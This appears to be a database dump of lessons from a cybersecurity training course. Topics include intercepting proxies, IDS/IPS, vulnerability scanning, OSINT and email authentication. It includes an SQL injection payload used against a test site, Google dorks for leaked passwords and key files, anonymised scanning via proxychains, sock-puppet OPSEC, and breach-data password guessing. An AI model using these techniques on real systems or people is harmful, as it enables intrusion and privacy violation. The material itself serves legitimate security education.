(468, 72, '## Web Proxies\n\nA Proxy sits between You (Client) and the Internet (Server).\n*   **Forward Proxy**: Protects the Client. (e.g., Corporate specific proxy filtering Facebook).\n*   **Reverse Proxy**: Protects the Server. (e.g., Cloudflare sits in front of a website to stop DDOS).\n\n### The Attacker\'s Proxy (Intercepting Proxy)\nTools like **Burp Suite** or **OWASP ZAP**.\nThey allow you to \"freeze\" time.\n1.  You click \"Login\" on a website.\n2.  The browser sends the POST request.\n3.  The Proxy CATCHES it before it goes to the server.\n4.  You edit the request (change `price=100` to `price=0`).\n5.  You forward it.\n6.  The server processes the modified request.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(469, 73, '## Burp Suite\n\nThe de-facto standard for Web App Hacking.\n\n### Key Components\n1.  **Dashboard**: Status checks.\n2.  **Proxy**: The Interceptor.\n    *   **Intercept is On**: Traffic stops until you click Forward.\n    *   **HTTP History**: A log of every request sent.\n3.  **Repeater**: Manual Testing. (Send -> Modify -> Resend).\n4.  **Intruder**: Brute forcing. (Send -> fuzz payload -> Resend 1000 times).\n5.  **Decoder**: Base64/URL encoding tool.\n\n### Setup\nBurp listens on `127.0.0.1:8080`.\nYou must configure your browser (Firefox) to send traffic there, or use Burp\'s built-in Chromium browser.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(470, 74, '## Hands On: Intercepting\n\n### Step-by-Step\n1.  Open Burp. Go to Proxy -> Intercept. Turn it **ON**.\n2.  Open Browser. Go to `http://testphp.vulnweb.com/login.php`.\n3.  Type `admin` / `admin` and hit Enter.\n4.  Browser hangs (it is waiting).\n5.  Look at Burp. You see the raw HTTP request:\n    ```http\n    POST /userinfo.php HTTP/1.1\n    Host: testphp.vulnweb.com\n    uname=admin&pass=admin\n    ```\n6.  Change `uname=admin` to `uname=\' OR 1=1 --`.\n7.  Click **Forward**.\n8.  Check Browser. You are logged in! (SQL Injection).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(471, 75, '## The Repeater\n\nThe most used tab in Burp.\nInstead of going back to the browser, re-typing the password, and hitting submit... just send the request to **Repeater**.\n\n### Workflow\n1.  Right click a request in Proxy History -> **Send to Repeater** (Ctrl+R).\n2.  Go to Repeater Tab.\n3.  Change one character.\n4.  Click **Send**.\n5.  Look at the Response on the right.\n6.  Repeat.\n\n### Decoder\nHackers use encoding to bypass filters.\n*   **Base64**: `admin` -> `YWRtaW4=`.\n*   **URL**: `SELECT *` -> `SELECT%20%2A`.\n*   Decoder helps you decode cookie values to see if they are readable.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(472, 76, '## Proxy Chaining (Anonymity)\n\nSometimes you need to hide where you are coming from.\n\n### TOR (The Onion Router)\n*   Routes traffic through 3 nodes (Entry -> Middle -> Exit).\n*   **Proxychains**: A Linux tool that forces *any* program to go through TOR.\n    *   `proxychains nmap -sT target.com`\n    *   Output: `DNS-request ... S-chain ... OK`\n\n### VPN vs Proxy\n*   **VPN**: Encrypts ALL traffic from your PC (OS level).\n*   **Proxy**: Encrypts/Routes traffic only for that specific App (Browser level).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(517, 77, '## IDS vs IPS: Architecture & Strategy\n\n**IDS (Intrusion Detection System)**: The Security Camera. It watches and alerts (Passive).\n**IPS (Intrusion Prevention System)**: The Bouncer. It watches and BLOCKS (Active).\n\n### Architecture Deployment\n*   **Out-of-Band (IDS)**:\n    *   Connected via a TAP or SPAN Port (Mirror).\n    *   It sees a *copy* of the traffic.\n    *   *Pro*: If the IDS crashes, network traffic continues (Fail-Open).\n    *   *Con*: It cannot stop a single packet, it can only send a \"Reset\" (TCP RST) packet to try and kill the connection, which often fails against fast attacks.\n*   **In-Line (IPS)**:\n    *   Sit directly in the wire (Cable A -> IPS -> Cable B).\n    *   *Pro*: Can drop packets instantly. 100% prevention.\n    *   *Con*: If the IPS crashes or gets overloaded, the internet goes down for the whole company (Fail-Closed).\n\n### Which one to use?\n*   **Core Core**: Usually IDS. You don\'t want to risk blocking the CEO\'s email.\n*   **Edge**: IPS (Firewall). Block known bad stuff aggressively.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:52'),
(518, 78, '## Detection Methodologies\n\nHow does the box know it\'s an attack?\n\n### 1. Signature-Based (The Anti-Virus Model)\n*   **Concept**: Pattern Matching.\n*   **Example**: \"If packet contains `0x909090` (NOP Sled) AND `cmd.exe` -> ALERT.\"\n*   **Pros**: Fast, Low False Positives.\n*   **Cons**: Blind to Zero-Days. If the attacker changes 1 byte of the payload, the signature fails. (e.g., `cmD.eXe`).\n\n### 2. Anomaly-Based (Behavioral)\n*   **Concept**: \"This looks weird.\"\n*   **Baseline**: The system learns \"Normal\". (e.g., \"Web Server usually speaks HTTP on port 80\").\n*   **Alert**: \"Web Server is speaking IRC on port 6667.\" -> ALERT.\n*   **Pros**: Catches Zero-Days.\n*   **Cons**: High False Positives. (Did the backup job start at a weird time? ALERT).\n\n### 3. Protocol Analysis (Stateful)\n*   **Concept**: Rules of the Road.\n*   **Example**: \"In TCP, after SYN, next must be SYN-ACK.\"\n*   **Alert**: \"Client sent ACK without SYN.\" -> ALERT (Malformed Packet / Scan).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(519, 79, '## Network (NIDS) vs Host (HIDS)\n\nYou need both.\n\n### NIDS (Suricata, Snort, Zeek)\n*   **View**: The Network Wire.\n*   **Blindspot**: **Encryption (TLS/SSL)**.\n    *   If the attacker uses HTTPS, the NIDS sees garbage ciphertext. It cannot detect the SQL Injection inside the SSL tunnel (unless you use SSL Termination).\n\n### HIDS (Wazuh, OSSEC, CrowdStrike)\n*   **View**: The Endpoint (OS).\n*   **Advantage**: It sees the data *after* decryption.\n*   **Advantage 2**: It sees local files and logs.\n*   **Example**: NIDS sees encrypted traffic. HIDS sees `cmd.exe` being spawned by IIS. HIDS wins here.\n\n### Deployment Strategy\n1.  **NIDS** at the gateway to filter massive noise.\n2.  **HIDS** on every server to catch what slips through.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(520, 81, '## Zeek (Bro) Surveillance\n\n**Zeek** is not a traditional IDS. It is a \"Network Flight Recorder\".\nIt doesn\'t just look for attacks; it logs **everything** in structured metadata.\n\n### The Power of Zeek\nInstead of a binary \"Match/No Match\", Zeek creates logs:\n*   `conn.log`: Every single TCP/UDP connection. (Duration, Bytes, Service).\n*   `http.log`: Every URL, User-Agent, Referrer.\n*   `dns.log`: Every DNS query.\n*   `ssl.log`: Every Certificate seen.\n\n### Forensics Use Case\n*   **Alert**: \"Malware detected on PC-5.\"\n*   **Question**: \"Has PC-5 talked to this C2 server before today?\"\n*   **Snort**: \"I don\'t know, there was no signature.\"\n*   **Zeek**: \"Yes. Checking `dns.log`... PC-5 queried `evil.com` 4 days ago. Checking `conn.log`... data was transferred.\"\n\n### Threat Hunting\n\"Show me all SSL Certificates where the Issuer is \'Let\'s Encrypt\' but the domain is a Bank.\" (Phishing).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(521, 82, '## Alert Triage & Investigation\n\nThe core loop of the SOC Analyst.\n\n### 1. Validation (True or False?)\n*   **Alert**: \"SQL Injection Detected from 1.2.3.4\".\n*   **Check**: Look at the HTTP Response Code.\n    *   if **200 OK**: The server accepted it. **True Positive**. (BAD).\n    *   if **500 Error**: The server crashed. **True Positive**. (BAD).\n    *   if **403 Forbidden**: The WAF blocked it. **True Positive (Blocked)**. (Good).\n    *   if **404 Not Found**: Scanner. **True Positive (Attempt)**.\n\n### 2. Context\n*   **Source IP**: Is it internal or external? Is it a known scanner (Shodan)?\n*   **Dest IP**: Is it a Critical Server or a Test Box?\n\n### 3. Investigation\n*   Checking other logs. \"Did the endpoint spawn a shell right after this?\"\n\n### 4. Categorization\n*   **True Positive**: Real Attack.\n*   **False Positive**: Normal traffic flagged as bad. (e.g., Admin running a backup script looks like data exfil).\n*   **False Negative**: Attack happened, but NO alert fired. (The worst case).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(522, 83, '## Handling False Positives\n\nTuning is the job of the Security Engineer.\n\n### Common Causes\n1.  **Vulnerability Scanners**: Nessus scans look like attacks. Whitelist the scanner IP.\n2.  **Poorly written rules**: A rule checking for \"files containing 00\" triggers on binary downloads.\n3.  **Updates/Software**: A new legit app behaves weirdly.\n\n### Tuning\n*   **Disable**: Turn off the rule entirely (Risky).\n*   **Suppress**: \"Don\'t alert on this rule for Source IP 1.2.3.4\". (Better).\n*   **Rewrite**: Make the rule more specific.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:05:38'),
(523, 84, '## The Vulnerability Lifecycle\n\nVulnerability Management (VM) is not just \"Scanning\". It is a process.\n\n### 1. Discovery\n*   Asset Inventory. You can\'t scan what you don\'t know exists.\n*   \"We found a rogue Raspberry Pi on the network.\"\n\n### 2. Prioritization\n*   Scanner says: \"Critical Bug on Server A (Test) and Server B (Production)\".\n*   **Context**: Server B exposes patient data. Server A is empty. Fix B first.\n\n### 3. Remediation\n*   **Patch**: Install the update.\n*   **Mitigate**: Cannot patch (Legacy App)? Add a Firewall rule (Virtual Patch).\n*   **Accept**: \"The risk is low, fixing it costs $1M. We accept the risk.\" (Must be signed by Exec).\n\n### 4. Verification\n*   Re-scan. \"Did the patch actually work?\"\n\n### The Time Gap\n**Window of Exposure**: The time between the bug discovery (Day 0) and the Patch applied (Day 30).\nYour goal is to shrink this window.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(524, 85, '## Authenticated vs Unauthenticated Scanning\n\n### Unauthenticated Scan (The Hacker\'s View)\n*   The scanner sends packets to ports (80, 443).\n*   It grabs banners: \"Apache 2.4.49\".\n*   It checks the Banner version against a CVE list.\n*   *Prob*: It misses everything inside the OS. Browsers, Adobe Reader, Kernel versions.\n*   *Result*: High False Positives (Backported patches look old).\n\n### Authenticated Scan (The Auditor\'s View)\n*   You give the scanner credentials (SSH specific user, or Windows Admin).\n*   The scanner logs in.\n*   It runs `rpm -qa` or looks at the Registry.\n*   \"I see Chrome version 80 installed.\"\n*   *Result*: Extremely accurate. This is the Gold Standard for corporate VM.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(525, 86, '## Decoding CVSS Scores\n\n**Common Vulnerability Scoring System (CVSS)** looks objective, but requires interpretation.\n\n### The Metrics (CVSS v3.1)\n*   **AV (Attack Vector)**: Network (N), Adjacent (A), Local (L), Physical (P).\n    *   *Network* is worst (Remote).\n*   **AC (Attack Complexity)**: Low (L) vs High (H).\n    *   *Low* means a script kiddie can do it.\n*   **PR (Privileges Required)**: None (N), Low (L), High (H).\n    *   *None* is worst (Unauth RCE).\n*   **UI (User Interaction)**: None (N) vs Required (R).\n    *   *Required* means user must click a link (Phishing).\n*   **S (Scope)**: Unchanged (U) vs Changed (C).\n    *   *Changed* means breaking out of the sandbox (VM Escape).\n*   **CIA**: Confidentiality, Integrity, Availability.\n\n### Example: Log4J\n**CVSS: 10.0** (Critical)\n`AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n*   Network Access.\n*   Low Complexity.\n*   No Privs.\n*   No User Click.\n*   Total compromise.\n*   **This is why it set the internet on fire.**', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(526, 87, '## Nessus Essentials\n\nThe world\'s most popular scanner.\n\n### Setup\n1.  Download Nessus Essentials (Free for 16 IPs).\n2.  Install (Web Interface on port 8834).\n3.  New Scan -> \"Basic Network Scan\".\n4.  Target: `192.168.1.0/24`.\n\n### Plugins\nNessus uses plugins (scripts written in NASL) to check for specific bugs.\n*   plugin #11011 (SMB Signing).\n*   plugin #33850 (Unsupported Unix OS).\nThere are 180,000+ plugins.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(527, 88, '## Analyzing Scan Reports\n\nScanners (Nessus, Qualys) generate 500-page PDF reports. Nobody reads them.\nYour job is to filter.\n\n### False Positives\n*   **Backporting**: Linux distros (RedHat) fix bugs but keep the version number same.\n    *   Scanner sees \"Apache 2.4.6\". Says \"Vulnerable to CVE-2019...\".\n    *   Reality: It is `Apache 2.4.6-97.el7`. The fix is applied.\n    *   *Action*: Verify using package manager (`yum info httpd`).\n\n### Supersedence\n*   Patch A fixes Bug 1.\n*   Patch B fixes Bug 1 and Bug 2.\n*   Report: Lists both.\n*   *Action*: Just install Patch B.\n\n### Focus on Exploitable\n*   A \"Critical\" bug with **No Exploit Available** is less dangerous than a \"High\" bug with a **Metasploit Module** available right now.\n*   Use Threat Intel to tag \"Exploited in the Wild\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(528, 89, '## Patch Management\n\nThe most effective security control.\n\n### The Patch Tuesday Cycle\nMicrosoft releases patches on the 2nd Tuesday of every month.\n1.  **Tuesday**: Patches released.\n2.  **Wednesday**: Testing in \"Dev\" environment. (Does the patch break the App?).\n3.  **Thursday**: Deploy to \"Pilot\" group (10% of users).\n4.  **Friday**: Deploy to everyone.\n\n### Legacy Systems\nWhat if you CAN\'T patch? (e.g., MRI machine running Windows XP).\n**Mitigating Controls**:\n*   **Air Gap**: Disconnect from internet.\n*   **VLAN**: Segregate it so it can only talk to the Printer.\n*   **IPS**: Virtual Patching (Block the exploit at the network level).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(529, 90, '## CVE (Common Vulnerabilities and Exposures)\n\nThe Dictionary. Managed by MITRE.\n\n### Format: CVE-YEAR-NUMBER\n*   `CVE-2017-0144` (EternalBlue).\n*   **Year**: When it was assigned (not necessarily disclosed).\n*   **Number**: Unique ID.\n\n### NVD (National Vulnerability Database)\nThe US Government database that adds context (CVSS score) to the CVE.\n*   Process: Researcher finds bug -> Requests CVE -> MITRE assigns ID -> Researcher publishes details -> NVD scores it.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(530, 91, '## Risk Response Strategies\n\nYou found a Critical Vuln. What now?\n\n1.  **Mitigate (Remediate)**: Fix it. (Apply Patch). Preferred.\n2.  **Accept**: \"We know it risky, but we need Windows XP for this old robot arm. We accept the risk.\" (Must be signed by Exec).\n3.  **Transfer**: Buy Insurance. \"If we get hacked, Insurance pays.\"\n4.  **Avoid**: Turn off the functionality. \"Disable SMBv1\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(531, 92, '## DAST (Dynamic Application Security Testing)\n\nTesting the running application from the outside (Black Box).\n*   **Tool**: OWASP ZAP, Burp Suite Pro, Acunetix.\n*   **Method**: Fuzzing. Throwing garbage at the app to see if it breaks.\n\n### SAST vs DAST\n*   **SAST (Static)**: Scans the Source Code (White Box). \"You have a variable that isn\'t sanitized on line 40.\"\n*   **DAST (Dynamic)**: Scans the URL. \"I sent \' OR 1=1 and got a database error.\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(532, 93, '## OWASP Top 10\n\nThe Ten Commandments of Web Security. Updated every few years (2021 is current).\n\n1.  **Broken Access Control**: User A can see User B\'s data.\n2.  **Cryptographic Failures**: Storing passwords in cleartext.\n3.  **Injection**: SQLi, Command Injection.\n4.  **Insecure Design**: Logic flaws.\n5.  **Security Misconfiguration**: Default passwords, Verbose error messages.\n6.  **Vulnerable Components**: Using an old jQuery library with known bugs.\n...\n(Memorize the top 3 at least!)', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(533, 94, '## OWASP ZAP (Zed Attack Proxy)\n\nThe \"Free Burp Suite\". Open Source.\n\n### Quick Start\n1.  **Automated Scan**: Type URL, click Attack.\n    *   Spider crawls the site.\n    *   Active Scanner attacks inputs.\n2.  **HUD**: ZAP injects a toolbar into your browser so you can hack while you surf.\n\n### Use Case\nGreat for CI/CD pipelines. You can automate ZAP to scan your website every night.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(534, 95, '## Spidering (Crawling)\n\nMapping the Application.\nThe scanner follows every link (`<a href=...>`) to find all pages.\n\n### Challenges\n1.  **Login Forms**: The spider hits the login page and stops. You must configure Auth.\n2.  **Infinite Loops**: Calibration calendar (Next Month -> Next Month -> ...). The spider gets stuck forever.\n3.  **Destructive Actions**: If the spider clicks \"Delete Account\", it deletes the account.\n    *   **Pro Tip**: Never scan Production with a privileged account unless you have backups.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(535, 96, '## Active Scanning Mechanics\n\nHow does the bot hack?\nIt uses **Payload Lists**.\n\n### Example: SQL Injection Check\n1.  Finds input `id=5`.\n2.  Sends `id=5\'`. Checks for \"Syntax Error\".\n3.  Sends `id=5 AND 1=1`. Checks if page loads.\n4.  Sends `id=5 AND 1=2`. Checks if page disappears.\nIf 3 works and 4 fails -> **Vulnerable**.\n\nThis creates thousands of requests. Do not run this on fragile legacy servers.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(536, 97, '## DAST False Positives\n\nDAST is noisy.\n*   **The \"Error Page\" Fallacy**: The scanner sees the word \"SQL\" on a page (e.g., in a blog post about SQL) and thinks it caused an error.\n*   **Timeout**: The scanner slowed down the server, causing 500 errors, which it interprets as vulnerabilities.\n\n**Verification**: always reproduce the finding manually with Burp Repeater.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(537, 98, '## Writing the Report\n\n Developers hate generic reports.\n\"Fix Cross Site Scripting\" - HOW? WHERE?\n\n### The Perfect Bug Report\n1.  **Title**: Reflected XSS on Search Page.\n2.  **Location**: `GET /search.php?q=PAYLOAD`\n3.  **Evidence**: Screenshot of the `alert(1)` box.\n4.  **Impact**: \"Attacker can steal session cookies.\"\n5.  **Fix**: \"Sanitize input using `htmlspecialchars()` function in PHP.\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(538, 160, '# Module 16 Final Quiz\n\nThis final test evaluates your understanding of the **Vulnerability Management** module.\n\n## Instructions\n*   This quiz contains **20 Questions**.\n*   It covers all topics: Lifecycle, Authentication, CVSS, Nessus, Reporting, Patching, CVEs, and Risk.\n*   There is no time limit, but try to answer without looking up the answers.\n\n## Key Concepts Reviewed\n*   **Lifecycle**: Discovery -> Assessment -> Prioritization -> Remediation -> Verification.\n*   **CVSS**: Base metrics (AV, AC, PR, UI, S, C, I, A).\n*   **Scans**: Auth vs Unauth, Internal vs External.\n*   **Reports**: Filter by Severity and Exploitability.\n*   **Remediation**: Patches, Workarounds, and Risk Acceptance.\n\nGood Luck!', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-26 22:11:01'),
(539, 181, '## What is OSINT?\n\n**Open Source Intelligence** is the art of finding information that is publicly available but hidden in plain sight.\n\n### The Scope\n*   **Public**: It must be accessible without hacking.\n*   **Legal**: You are not breaking into servers. You are reading what they posted.\n\n### Passive vs Active\n*   **Passive Recon**: You never touch the target\'s servers.\n    *   Looking at Archive.org, LinkedIn, Whois.\n    *   *Risk*: Zero. The target doesn\'t know you exist.\n*   **Active Recon**: You touch the target.\n    *   Port Scanning (Nmap), Banner Grabbing.\n    *   *Risk*: High. The firewall logs your IP.\n\n### The \"Grey Man\" Concept\nAn OSINT analyst must be invisible.\n*   Do not like posts on LinkedIn with your real account.\n*   Do not visit the target website from your corporate VPN.\n*   Use a \"Sock Puppet\" (Fake Persona).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(540, 182, '## The Intelligence Cycle\n\nHow to turn \"Data\" into \"Intelligence\".\n\n1.  **Planning (Requirements)**: \"Does this company have a presence in China?\"\n2.  **Collection**: Running tools.\n    *   \"Found 500 IPs.\"\n    *   \"Found 50 employees on LinkedIn.\"\n    *   This is just noise (Raw Data).\n3.  **Processing**: Filtering.\n    *   \"Remove the 400 IPs that are Cloudflare.\" (Useless).\n    *   \"Translate the Chinese profiles to English.\"\n4.  **Analysis**: The \"So What?\".\n    *   \"Employee X posted a photo of the server room password on Instagram.\"\n    *   *Conclusion*: They have weak physical security policies.\n5.  **Dissemination**: The Report.\n    *   \"To: CISO. From: Intel Team. Subject: Credential Leak.\"\n6.  **Feedback**: \"Was this helpful?\"', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(541, 183, '## OPSEC & Sock Puppets\n\n**Operational Security (OPSEC)** is protecting *yourself* while you hunt.\n\n### The Sock Puppet (Fake Account)\n*   **Name**: Create a fake name (Use a generator).\n*   **Photo**: Do NOT use ThisPersonDoesNotExist.com (AI artifacts are easy to spot). Use a generic photo (e.g., a car, a landscape) or a heavily modified real photo.\n*   **History**: An account created today with 0 friends is suspicious.\n    *   \"Age\" the account. Post random stuff for a month before using it.\n    *   Add random people (Recruiters accepted everyone).\n\n### Technical OPSEC\n*   **Browser**: Use a separate browser profile.\n*   **VPN**: Always on. Use a commercial VPN (Proton, Mullvad).\n*   **VM**: Use a disposable Virtual Machine. If you download malware by accident, just delete the VM.\n*   **Burner Phones**: For 2FA verification (Google Voice, textverified.com).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(542, 184, '## Google Dorking Mastery\n\nGoogle is a hacking tool.\n\n### Operators\n*   `site:` Search only this domain. (`site:target.com`)\n*   `filetype:` Search file extensions. (`filetype:pdf`)\n*   `inurl:` Search the URL bar. (`inurl:admin`)\n*   `intitle:` Search the page title. (`intitle:\"index of\"`)\n\n### The \"Juicy\" Dorks\n1.  **Finding Passwords**:\n    `site:pastebin.com \"password\" \"target.com\"`\n2.  **Finding Config Files**:\n    `site:target.com filetype:env` (Looking for .env files with AWS keys).\n3.  **Finding Admin Panels**:\n    `site:target.com inurl:login`\n4.  **Finding Directory Listings**:\n    `intitle:\"index of\" \"backup\"`\n\n### Google Hacking Database (GHDB)\nA repository of thousands of pre-made dorks maintained by Exploit-DB.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 16:32:38'),
(543, 185, '## People Reconnaissance\n\nFinding a person.\n\n### The Username correlation\nMost people use the same username everywhere.\n*   `namechk.com`: Check if `supercoder99` is taken on Instagram, Github, TikTok.\n*   If they use the same avatar on multiple sites, that is a strong confirmation.\n\n### Real Estate & Voter Records\nIn the US, voter records and property deeds are public.\n*   Sites like `TruePeopleSearch` or `FamilyTreeNow` aggregate this.\n*   You can find Home Addresses, Phone Numbers, and Relatives for free.\n*   **Defensive Note**: You should opt-out of these sites to protect yourself.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(544, 186, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(545, 187, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(546, 188, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(547, 189, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(548, 190, '# Module 18 Final Quiz\n\nTest your mastery of Open Source Intelligence.\n\n## Instructions\n*   **20 Questions**.\n*   Covering: Fundamentals, Dorking, People, Tools, and Ethics.\n\nGood Luck, Detective!', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-26 22:15:16'),
(549, 191, '## Email Anatomy: RFC 5322\n\nTo stop phishing, you must read the **Header**.\n\n### The Envelope vs The Letter\n*   **Envelope (SMTP)**: `MAIL FROM: attacker@evil.com`. (The server reads this).\n*   **Letter (Header)**: `From: \"CEO\" <ceo@company.com>`. (The user reads this).\n*   **Spoofing**: The attacker puts their real address on the Envelope (so the email arrives) but puts the CEO\'s address on the Letter (so the victim is tricked).\n\n### Key Header Fields\n*   **Received**: The hop-by-hop path. Read from **Bottom to Top**.\n    *   `Received: from mail.evil.com [1.2.3.4]` -> **True Source**.\n*   **Reply-To**: Often different from \"From\".\n    *   \"From: HelpDesk\"\n    *   \"Reply-To: hacker@gmail.com\"\n*   **X-Mailer**: The software used.\n    *   `PHP/7.4` -> Suspicious. Normal people use Outlook/Gmail, not PHP scripts.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(550, 192, '## Authentication: SPF, DKIM, DMARC\n\nThe Trinity of Email Security.\n\n### 1. SPF (Sender Policy Framework)\n*   **Identity Card**.\n*   DNS TXT Record: `v=spf1 include:_spf.google.com -all`\n*   **Meaning**: \"Only Google\'s servers are allowed to send email for my domain. Reject everyone else.\"\n*   **Check**: Look for `Authentication-Results: spf=pass` in the header.\n\n### 2. DKIM (DomainKeys Identified Mail)\n*   **Wax Seal**.\n*   Cryptographic signature attached to the email.\n*   **Meaning**: \"This email has not been modified in transit.\"\n*   **Check**: Look for `dkim=pass`.\n\n### 3. DMARC (Domain-based Message Authentication)\n*   **The Policy**.\n*   \"If SPF fails OR DKIM fails, what should I do?\"\n    *   `p=none`: Do nothing (Analysis mode).\n    *   `p=quarantine`: Send to Spam folder.\n    *   `p=reject`: Bounce the email (Delete it).\n*   **Goal**: Every company wants to be at `p=reject`.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(551, 193, '## The CEO Fraud (BEC)\n\n**Business Email Compromise (BEC)** causes more financial loss than Ransomware.\n\n### The Scenario\n*   **Target**: The CFO (Finance Director).\n*   **Attacker**: Impersonates the CEO.\n*   **Email**: \"Hi Bob, I am in a meeting. Be discreet. I need you to wire $50k to this vendor immediately. It is for a secret acquisition.\"\n\n### Indicators\n1.  **Urgency**: \"Immediately\", \"Secret\", \"Before the cutoff\".\n2.  **Authority**: Leveraging the CEO\'s title to bypass procedures.\n3.  **Spoofing**: Look closely at the email.\n    *   `ceo@company-corp.com` (Typosquatting).\n    *   `ceo@company.com` (Display Name Spoofing).\n\n### Defense\n*   **Process**: \"Any wire transfer over $10k requires voice verification.\"\n*   **Tagging**: Add `[EXTERNAL]` tag to email subject lines.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(552, 194, '## Investigation: Malicious Attachments\n\n### Common File Types\n1.  **.exe / .scr / .bat**: Executables. Usually blocked by gateway.\n2.  **.docm / .xlsm**: Office Macros. Very common.\n    *   User opens Doc -> Click \"Enable Content\" -> Macro runs PowerShell -> Downloads Malware.\n3.  **.zip / .iso**: Containers. Used to bypass scanners.\n4.  **.html**: HTML Smuggling. The file decodes itself in the browser.\n\n### Analysis Tools\n1.  **Talos File Reputation**: Check the hash.\n2.  **OLEVBA**: Python tool to extract Macros from Office docs.\n3.  **Any.Run / Joe Sandbox**: Detonate the file in a sandbox and watch the video.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
